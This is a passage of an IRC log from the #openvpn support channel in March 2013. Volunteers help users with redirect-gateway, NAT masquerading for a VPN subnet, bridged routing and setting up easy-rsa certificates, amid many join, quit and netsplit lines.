18:33 < nikitosiusis> jasonsmr, do you use redirect-gateway ?
18:34 -!- You're now known as ecrist
18:35 -!- mode/#openvpn [+o ecrist] by ChanServ
18:35 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
18:35 -!- mode/#openvpn [+o krzee] by ChanServ
18:35 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn
18:36 -!- Ancient [~ancient@us.whatbox.ca] has quit [Ping timeout: 256 seconds]
18:36 -!- Ancient|2 [~ancient@us.whatbox.ca] has joined #openvpn
18:44 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
18:45 -!- NotKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn
18:46 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds]
18:46 -!- Denial- is now known as Denial
18:46 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Quit: nonotza]
18:47 -!- abec0_ [olivier@vvma.net] has joined #openvpn
18:47 -!- eres_ [~rs@onyon.net] has joined #openvpn
18:47 -!- Netsplit *.net <-> *.split quits: Olipro, piele, [fred]
18:48 -!- Netsplit over, joins: piele, Olipro, [fred]
18:48 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Max SendQ exceeded]
18:50 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 256 seconds]
18:52 -!- Netsplit *.net <-> *.split quits: zarrsh, VunKruz, sitaktif1, +[oc80z], jarray521, cronix, fatpony, eres, ceda, abec0, (+1 more, use /NETSPLIT to show all of them)
18:52 -!- ngharo [~ngharo@hacked.thegov.us] has quit [Ping timeout: 264 seconds]
18:52 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn
18:53 -!- jasonsmr [~Administr@c-68-61-42-207.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds]
18:53 -!- ngharo [~ngharo@hacked.thegov.us] has joined #openvpn
18:54 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn
18:54 -!- pcdummy_ [~quassel@mx1.page4me.ch] has joined #openvpn
18:55 -!- pcdummy [~quassel@unaffiliated/pcdummy] has quit [Ping timeout: 264 seconds]
18:55 -!- jasonsmr [~Administr@c-68-61-42-207.hsd1.mi.comcast.net] has joined #openvpn
18:56 < jasonsmr> hello again
18:56 < jasonsmr> what do you mean redirect-gateway ?
18:57 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
18:57 -!- jarray52 [~bigbear@unaffiliated/jarray52] has joined #openvpn
18:57 -!- jpalmer_ [~jpalmer@irc.PalmerIT.net] has joined #openvpn
18:57 -!- Netsplit *.net <-> *.split quits: cyberspace-, tabakhase, havoc_, jave
18:57 -!- jarray52 [~bigbear@unaffiliated/jarray52] has left #openvpn []
18:58 -!- Netsplit *.net <-> *.split quits: mcp, penk, mete, n2deep, joshie, MorgyN, roue_
18:58 -!- njbair_ [~njbair@user-12l369d.cable.mindspring.com] has joined #openvpn
18:58 -!- krzie [nobody@openvpn/community/support/krzee] has joined #openvpn
18:58 -!- mode/#openvpn [+o krzie] by ChanServ
18:58 < jasonsmr> oh yes on the client config I have redirect-gateway def1
18:58 -!- nastjuid_ [~nastjuid@c-76-102-128-160.hsd1.ca.comcast.net] has joined #openvpn
18:58 -!- parmegv_ [U2FsdGVkX1@ma.sdf.org] has joined #openvpn
18:58 < jasonsmr> can I safely take this out?
18:59 <@krzie> if you don't want it...
18:59 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
18:59 -!- zarrsh [~zarrsh@cpe-65-27-192-220.cinci.res.rr.com] has joined #openvpn
18:59 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has quit [Ping timeout: 264 seconds]
19:00 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn
19:00 < jasonsmr> right, I guess not, if it's attempting to redirect the default gateway, which apparently is its function ;)
19:01 -!- Netsplit over, joins: mete
19:01 -!- krzie is now known as krzee
19:01 -!- Sickness\ [~stront@unaffiliated/s-work] has quit [Ping timeout: 256 seconds]
19:01 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Ping timeout: 264 seconds]
19:02 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn
19:02 -!- jpalmer [~jpalmer@unaffiliated/jpalmer] has quit [Excess Flood]
19:02 -!- parmegv [U2FsdGVkX1@ma.sdf.org] has quit [Write error: Broken pipe]
19:02 -!- nastjuid [~nastjuid@c-76-102-128-160.hsd1.ca.comcast.net] has quit [Write error: Broken pipe]
19:02 -!- njbair [~njbair@user-12l369d.cable.mindspring.com] has quit [Write error: Broken pipe]
19:02 -!- havoc [~havoc@208.87.120.111] has joined #openvpn
19:02 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
19:02 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn
19:02 -!- tabakhase [t4b4kh453@unaffiliated/tabakhase] has joined #openvpn
19:02 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Excess Flood]
19:02 -!- C-S-B [~C-S-B@host86-171-109-108.range86-171.btcentralplus.com] has quit [Excess Flood]
19:02 <@krzee> pekster, your tip about adding an extra return 0 to my functions is continuing to help me. thanks again :)
19:02 -!- simcop2387_ [~simcop238@p3m/member/simcop2387] has joined #openvpn
19:03 -!- cyberspace- [20253@ninthfloor.org] has quit [Max SendQ exceeded]
19:03 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood]
19:03 -!- simcop2387_ is now known as simcop2387
19:03 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has joined #openvpn
19:03 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn
19:03 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
19:03 -!- oc80z [oc80z@blea.ch] has joined #openvpn
19:03 -!- C_S_B [~C-S-B@craigsblackie.broker.freenet6.net] has joined #openvpn
19:03 -!- batrick_ [~batrick@batbytes.com] has joined #openvpn
19:03 -!- mcp [~mcp@wolk-project.de] has joined #openvpn
19:03 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn
19:03 -!- joshie [~josh@joshie.net] has joined #openvpn
19:03 -!- MorgyN [~mig@island.morgyn.org] has joined #openvpn
19:04 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has quit [Changing host]
19:04 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn
19:04 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has joined #openvpn
19:04 -!- cronix [~cronix@HSI-KBW-046-005-192-177.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn
19:04 -!- fatpony [~fatpony@unaffiliated/fatpony] has joined #openvpn
19:04 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Excess Flood]
19:04 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn
19:05 < jasonsmr> okay, that seems to work the way that I want it to, now how do I set up the radius method? because the radius method with the ca.srt server and client did not work for me,
19:05 <@krzee> radius method?
19:06 < jasonsmr> I'm trying to set up a cluster and the VPN was just to have another method of communicating within the cluster
19:06 < jasonsmr> well apparently there was a method to authenticate using the radius server plugin opposed to the secrets file method
19:07 -!- joshie_ [~josh@joshie.net] has joined #openvpn
19:08 <@krzee> yep, have you read the docs on the radius plugin?
19:08 -!- penk [~dave@mcovernet.mosaic-commons.org] has joined #openvpn
19:08 -!- n2deep [n2deep@odin.sdf-eu.org] has quit [Ping timeout: 272 seconds]
19:08 -!- joshie [~josh@joshie.net] has quit [Ping timeout: 272 seconds]
19:11 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
19:11 -!- n2deep_ [n2deep@odin.sdf-eu.org] has joined #openvpn
19:12 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Disconnected by services]
19:14 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn
19:14 -!- mode/#openvpn [+o vpnHelper] by ChanServ
19:14 -!- MorgyN [~mig@island.morgyn.org] has quit [Ping timeout: 272 seconds]
19:15 -!- mcp [~mcp@wolk-project.de] has quit [Ping timeout: 272 seconds]
19:15 -!- pekster [~rewt@openvpn/community/support/pekster] has quit [Remote host closed the connection]
19:15 -!- MorgyN [~mig@island.morgyn.org] has joined #openvpn
19:16 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-yzqmsjdgbqggwoyb] has joined #openvpn
19:17 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 256 seconds]
19:18 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 256 seconds]
19:19 -!- simcop2387_ [~simcop238@p3m/member/simcop2387] has joined #openvpn
19:19 -!-
hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 19:20 -!- n2deep_ [n2deep@odin.sdf-eu.org] has quit [Ping timeout: 245 seconds] 19:21 -!- pekster_ [~rewt@cl-466.chi-03.us.sixxs.net] has joined #openvpn 19:21 -!- pekster_ [~rewt@cl-466.chi-03.us.sixxs.net] has quit [Changing host] 19:21 -!- pekster_ [~rewt@openvpn/community/support/pekster] has joined #openvpn 19:21 -!- penk [~dave@mcovernet.mosaic-commons.org] has quit [Quit: Leaving...] 19:21 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn 19:21 -!- tyteen4a03 [tyteen4a03@us2.freeBNC.net] has quit [Ping timeout: 264 seconds] 19:21 -!- pekster [~rewt@openvpn/community/support/pekster] has quit [Ping timeout: 264 seconds] 19:21 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn 19:21 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 19:22 -!- Netsplit *.net <-> *.split quits: cronix, ceda, fatpony 19:22 -!- thumbs is now known as httpd 19:23 -!- Netsplit over, joins: ceda 19:23 -!- httpd is now known as thumbs 19:23 -!- Netsplit over, joins: cronix 19:23 -!- Netsplit over, joins: fatpony 19:24 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 19:24 -!- Netsplit *.net <-> *.split quits: speed_racer8, _quadDamage, simcop2387, rob0, eres_, MeanderingCode_ 19:24 -!- simcop2387_ is now known as simcop2387 19:25 -!- tyteen4a03 [tyteen4a03@us2.freeBNC.net] has joined #openvpn 19:26 -!- penk [~dave@97.95.190.204] has joined #openvpn 19:27 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-xkuztbndblojovtg] has quit [Ping timeout: 256 seconds] 19:28 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 19:28 -!- MeanderingCode [~Meanderin@71-213-190-2.albq.qwest.net] has joined #openvpn 19:28 -!- oc80z [oc80z@blea.ch] has quit [Ping timeout: 258 seconds] 19:28 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 258 seconds] 19:28 -!- tcamuso_ [~tcamuso@pool-71-161-82-88.cncdnh.east.myfairpoint.net] 
has quit [Ping timeout: 258 seconds] 19:29 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 258 seconds] 19:29 -!- tcamuso__ [~tcamuso@pool-71-161-82-88.cncdnh.east.myfairpoint.net] has joined #openvpn 19:29 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 19:29 -!- mode/#openvpn [+o vpnHelper] by ChanServ 19:29 -!- hazardous [~dbn@void.kassad.in] has quit [Ping timeout: 258 seconds] 19:29 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 19:30 -!- eres [~rs@83.167.228.121] has joined #openvpn 19:30 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 258 seconds] 19:30 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 258 seconds] 19:30 -!- rob0 [rob0@harrier.slackbuilds.org] has joined #openvpn 19:30 -!- rob0 [rob0@harrier.slackbuilds.org] has quit [Changing host] 19:30 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 19:31 -!- zeroXten [~zeroXten@0x10.co.uk] has quit [Ping timeout: 256 seconds] 19:31 -!- soapee01_ is now known as soapee01 19:31 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 19:32 -!- jzaw [~jzaw@loki.dzki.co.uk] has quit [Ping timeout: 258 seconds] 19:32 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 19:32 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Ping timeout: 256 seconds] 19:32 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 19:32 -!- MorgyN [~mig@island.morgyn.org] has quit [Ping timeout: 258 seconds] 19:32 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 19:32 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 19:32 -!- mode/#openvpn [+o vpnHelper] by ChanServ 19:32 -!- Ancient|2 [~ancient@us.whatbox.ca] has left #openvpn ["Leaving"] 19:33 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Read error: Operation timed out] 19:33 -!- MorgyN [~mig@island.morgyn.org] has 
joined #openvpn 19:33 -!- lmm [uid6417@gateway/web/irccloud.com/x-pdubufobwmodlaqn] has quit [Ping timeout: 256 seconds] 19:33 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 19:33 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has quit [Ping timeout: 258 seconds] 19:34 -!- js_ [~js@li503-152.members.linode.com] has quit [Ping timeout: 258 seconds] 19:34 -!- lmm [uid6417@gateway/web/irccloud.com/x-jbjiakelitrhoejp] has joined #openvpn 19:34 -!- Netsplit *.net <-> *.split quits: fatpony, inimino, joshie_ 19:35 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 19:35 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 256 seconds] 19:36 -!- pppingme [~pppingme@65.28.110.103] has joined #openvpn 19:36 -!- pppingme [~pppingme@65.28.110.103] has quit [Changing host] 19:36 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 19:36 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 256 seconds] 19:36 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 258 seconds] 19:36 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 258 seconds] 19:37 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Client Quit] 19:37 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-wkuxkpkoldxkvqtz] has quit [Ping timeout: 245 seconds] 19:37 -!- tcamuso__ [~tcamuso@pool-71-161-82-88.cncdnh.east.myfairpoint.net] has quit [Ping timeout: 256 seconds] 19:38 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 19:38 -!- jzaw [~jzaw@2001:8b0:7:0:5054:ff:fe8e:3b24] has joined #openvpn 19:38 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 19:38 -!- fatpony [~fatpony@88-190-211-231.rev.dedibox.fr] has joined #openvpn 19:38 -!- fatpony [~fatpony@88-190-211-231.rev.dedibox.fr] has quit [Changing host] 19:38 -!- fatpony [~fatpony@unaffiliated/fatpony] has joined #openvpn 19:39 -!- pppingme 
[~pppingme@unaffiliated/pppingme] has quit [Remote host closed the connection] 19:39 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn 19:39 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 19:39 -!- js_ [~js@176.58.116.152] has joined #openvpn 19:39 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn 19:39 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 256 seconds] 19:39 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host] 19:39 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 19:40 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 19:40 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Ping timeout: 258 seconds] 19:40 -!- hazardous [~dbn@void.kassad.in] has quit [Ping timeout: 264 seconds] 19:41 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 19:41 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 19:41 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 19:41 -!- rob0 [rob0@harrier.slackbuilds.org] has joined #openvpn 19:41 -!- rob0 [rob0@harrier.slackbuilds.org] has quit [Changing host] 19:41 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 19:41 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 19:41 -!- mode/#openvpn [+o vpnHelper] by ChanServ 19:41 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 19:41 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Read error: Connection reset by peer] 19:41 -!- AsadH [~AsadH@irc.unixio.com] has joined #openvpn 19:41 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 19:41 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 19:41 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 19:41 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 19:42 -!- mete [~mete@mete.shell.la] has quit [Ping timeout: 256 seconds] 19:42 -!- pekster_ is now known as pekster 19:43 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has joined 
#openvpn 19:43 -!- SuperGauntlet [~SuperGaun@d14-69-67-219.try.wideopenwest.com] has joined #openvpn 19:43 < SuperGauntlet> !tcp 19:43 < SuperGauntlet> shoot, wrong one. Is it !forwarding? 19:43 < SuperGauntlet> !forwarding 19:44 <@krzee> !ping 19:44 <@krzee> freenode issues 19:44 -!- js__ [~js@li503-152.members.linode.com] has joined #openvpn 19:44 -!- oc80z [oc80z@blea.ch] has joined #openvpn 19:44 < SuperGauntlet> damn. 19:44 -!- mete [~mete@mete.shell.la] has joined #openvpn 19:44 <@krzee> what are you looking for? 19:44 < SuperGauntlet> uhh, what's the iptables command to route traffic as a NAT through the router? 19:44 < SuperGauntlet> it had masquerade at the end IIRC 19:44 < SuperGauntlet> I have ipv4 forwarding turned on in sysctl 19:45 -!- joshie [~josh@joshie.net] has joined #openvpn 19:45 -!- inimino [~inimino@oftn/board/inimino] has joined #openvpn 19:45 <@krzee> iptables -t nat -A POSTROUTING -s $PRIVATE -o eth0 -j MASQUERADE 19:45 <@krzee> assuming $private is your vpn subnet 19:45 < SuperGauntlet> Where $private is like 10.8.whatever? 19:45 <@krzee> ya 19:45 < SuperGauntlet> i think in this case 10.8.0.0/24 19:45 <@krzee> don't forget to enable ip forwarding as well 19:45 < SuperGauntlet> whatever default is 19:45 <@krzee> yes ^ 19:46 <@krzee> there is no default 19:46 -!- joshie is now known as Guest16753 19:46 <@krzee> its whatever you used in --server 19:46 < SuperGauntlet> the server line is 10.8.0.0 255.255.255.0 19:46 < SuperGauntlet> so 10.8.0.0/24, correct? 
19:46 <@krzee> yes 19:47 * krzee kicks vpnHelper 19:47 <@krzee> !ping 19:47 -!- pwrcycle_ [~pwrcycle@173.214.160.92] has joined #openvpn 19:47 -!- cronix2 [~cronix@HSI-KBW-046-005-192-177.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 19:48 < SuperGauntlet> Alright, works, thanks 19:48 -!- kantlive- [~kantlivel@home.kantlivelong.com] has joined #openvpn 19:48 <@krzee> yw 19:48 < SuperGauntlet> I should automate that 19:48 < SuperGauntlet> maybe add it in the openvpn init script or something dumb like that 19:50 < pekster> krzee: FYI, massive delays all over. Nickserv (the real one, not some spoof) took a good 2 minutes to reply to me 19:50 < SuperGauntlet> yeah I see why UDP is recommended, I'm getting about 70% the speed of UDP with TCP 19:50 < SuperGauntlet> ping is about the same though. 19:50 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 19:50 -!- js_ [~js@176.58.116.152] has quit [Ping timeout: 258 seconds] 19:50 -!- cronix2 is now known as 18VAAWJLJ 19:50 -!- oc80z [oc80z@blea.ch] has quit [Read error: Connection reset by peer] 19:50 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 258 seconds] 19:50 -!- cronix [~cronix@HSI-KBW-046-005-192-177.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 258 seconds] 19:50 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 19:50 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 19:50 -!- mode/#openvpn [+o vpnHelper] by ChanServ 19:50 -!- oc80z [oc80z@blea.ch] has joined #openvpn 19:51 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 264 seconds] 19:51 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has quit [Ping timeout: 264 seconds] 19:52 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has joined #openvpn 19:53 <@krzee> pekster, did my message of thanks make it to you? 
19:54 < pekster> Yup
19:54 <@krzee> cool =]
19:54 < pekster> We'll beat some cood coding practices into you yet ;)
19:54 <@krzee> one day ;]
19:54 < pekster> good*
19:55 < pekster> Development: where all the bugs happen^wget fixed
19:55 <@krzee> lol
20:21 < nsx> Hey guys, this is my situation: 2 interfaces eth0 [172.22.22.0/24] and br0(eth1+tap0) [172.23.23.0/24]. clients connect via the eth0 interface and are bridged onto the 23.23 network. Clients on the 23.23 network are able to communicate with hosts on the 22.22 network, but "ping -I br0 172.22.22.1" doesn't work. So i'm guessing routing issues - any ideas?
20:22 < nsx> maybe pekster has an idea? You usually do
20:24 <@krzee> does 172.22.22.1 know what machine it needs to send traffic to in order to reach the vpn subnet?
20:24 <@krzee> i don't do bridges but my first guess would be !route_outside_ovpn
20:24 <@krzee> !route_outside_ovpn
20:24 <@krzee> (if vpnHelper answers)
20:24 <@vpnHelper> "route_outside_ovpn" is "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png
20:28 < nsx> hmm it should, but wait a minute
20:41 < nsx> krzee: think you just helped me one step closer to a solution :) thx!
21:25 < SuperGauntlet> man what kind of jerk DDoSes freenode?
21:25 < SuperGauntlet> -_-
--- Day changed Mon Mar 25 2013
--- Log closed Mon Mar 25 00:44:46 2013
--- Log opened Mon Mar 25 00:45:02 2013
05:06 < maetrik> !welcome
05:06 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
05:06 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
05:06 < maetrik> !redirect
05:06 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
05:06 <@vpnHelper> http://ircpimps.org/redirect.png
05:07 < maetrik> !howto
05:07 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
05:08 < maetrik> !sample
05:08 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting
06:58 * EugeneKay gives pants to ecrist
06:58 <@ecrist> ?
06:58 <@EugeneKay> I thought you might need them
06:58 <@ecrist> I'd have to wear them, in order to need them.
07:37 < auska> Hi! When I use openVPN I lost the ssh connection to my server. How can I configure openVPN to redirect all traffic except from the ssh?
07:37 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 07:41 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has joined #openvpn 07:44 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 07:45 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:46 -!- ade_b [~Ade@koln-5d81a61d.pool.mediaWays.net] has joined #openvpn 07:46 -!- ade_b [~Ade@koln-5d81a61d.pool.mediaWays.net] has quit [Changing host] 07:46 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 07:51 < maetrik> Is there an easy way to install easy-rsa on Ubuntu 12.04? 07:52 < maetrik> I've installed 2.3.0 and now need easy-rsa. 07:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 07:53 -!- penk [~dave@static-66-137-171-68.axsne.net] has joined #openvpn 07:55 < pekster> !easy-rsa 07:55 <@vpnHelper> "easy-rsa" is (#1) easy-rsa is a certificate generation utility. or (#2) Download here: https://github.com/OpenVPN/easy-rsa/downloads or (#3) Download easy-rsa from git hub at https://github.com/OpenVPN/easy-rsa 07:55 -!- TypoNe [~itsme@195.197.184.87] has quit [Quit: I shouldn't really be here - dircproxy 1.1.0] 07:55 < pekster> maetrik: ^^ 07:55 < maetrik> Yes, I have the download link. Just wondering how I should install. 07:55 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 07:56 < pekster> auska: Is your "server" actually an openvpn "client" using --redirect-gateway, or do you mean you've somehow tried to use that directive on an OpenVPN peer configured as the server? 07:58 < maetrik> ah wait, i can install it with apt-get pekster 07:58 < pekster> auska: Since easy-rsa is just a collection of scripts, you can simply copy the 'easy-rsa/2.0' subdirectory somewhere useful and begin using it. 
That said, we've made some changes recently and you might be better off grabbing a copy of the latest development changes from here: https://github.com/OpenVPN/easy-rsa 07:58 <@vpnHelper> Title: OpenVPN/easy-rsa · GitHub (at github.com) 07:59 < pekster> I'm not sure about 12.04; I don't seem to see any easy-rsa in the repos for 12.10, but maybe my test VM is too new 07:59 < maetrik> ok 08:04 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 08:08 -!- p3rror [~mezgani@41.140.181.89] has joined #openvpn 08:08 -!- civillian [~nick@174.202.49.122-static.velocitynet.com.au] has joined #openvpn 08:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 08:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Client Quit] 08:14 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Quit: Leaving] 08:15 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:15 < rob0> You don't need easy-rsa to be in your distro package manager. In fact you should just run it from a non-root $HOME directory. 08:18 -!- AvatarAang [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:18 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 08:18 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 245 seconds] 08:18 -!- AvatarAang is now known as Valcorb 08:29 -!- Pei_ is now known as Pei 08:36 -!- Ah2k [Ah2k@114.31.8.194] has quit [Read error: Connection reset by peer] 08:36 -!- Ah2k [Ah2k@114.31.8.194] has joined #openvpn 08:41 < maetrik> ok rob0 thanks 08:43 < maetrik> this is all new to me, i basically rent a small vps in the us so that i can watch some us only content from europe 08:44 < maetrik> so i need to setup openvpn server on that vpn 08:44 < maetrik> *vps 08:44 < maetrik> i'll get there, learning new stuff every day hah 08:49 < rob0> you definitely do NOT want to run easy-rsa on a VPS. 
It should be on a real, physical computer. 09:03 < maetrik> why? 09:03 < maetrik> you see i am learning here ;) 09:04 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 09:05 < rob0> A virtual machine has no entropy source for random data, thus is not suitable for generating cryptographic keys. 09:05 < maetrik> what should i do? run it on my own machine? 09:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 09:12 < rob0> Your CA signing should not be done on the VPN server, either. That would mean if an attacker got shell and root on the server, they'd also gain control of your CA/PKI. Run easy-rsa on a real, physical computer, ideally, not one which is part of the VPN. 09:13 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:16 < maetrik> ok 09:25 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 09:47 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 09:48 < MacGyver> rob0: Well, that does really depend on the way the virtual machine's /dev/random works... But you can't trust it. 09:50 < pekster> Nope. It that's just the kernel's frontend for a device node to reference when you want a stream of psudo-random numbers. The magic happens on the other side dealing with entropy collection. VMs are going to have very poor entropy becauase they lack direct physical hardware that accounts for most of the valuable entropy on a modern computer 09:52 < MacGyver> pekster: You're assuming that 